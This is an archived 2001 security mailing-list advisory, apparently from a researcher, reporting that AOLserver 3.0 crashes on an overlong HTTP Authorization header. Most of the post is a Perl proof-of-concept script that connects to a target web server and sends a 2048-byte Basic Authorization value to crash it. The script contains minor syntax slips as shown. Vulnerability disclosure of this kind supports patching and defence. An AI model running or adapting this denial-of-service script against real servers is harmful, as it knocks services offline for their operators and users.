OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Nate Haggard (natesecuritylogics.com)
Date: Wed Aug 22 2001 - 17:51:45 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Aolserver 3.0 will crash when it is given a long authorization string. It
    is also possible this vulnerability will allow a hacker to execute
    arbitrary code through a buffer overflow. I have not verified a buffer
    overflow exists. Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.

    Here is a sample exploit:
    ------------------------------------------
    #!/usr/bin/perl
    use IO::Socket;
    unless (ARGV == 1) { die "usage: $0 host ..." }
    $host = shift(ARGV);
    $remote = IO::Socket::INET->new( Proto => "tcp",
                                     PeerAddr => $host,
                                     PeerPort => "http(80)",
                                     );
    unless ($remote) { die "cannot connect to http daemon on $host" }

    $junk = "X" x 2048;
    $killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
    $remote->autoflush(1);
    print $remote $killme;
    close $remote;

    --------------------
    Nate Haggard
    SecurityLogics.com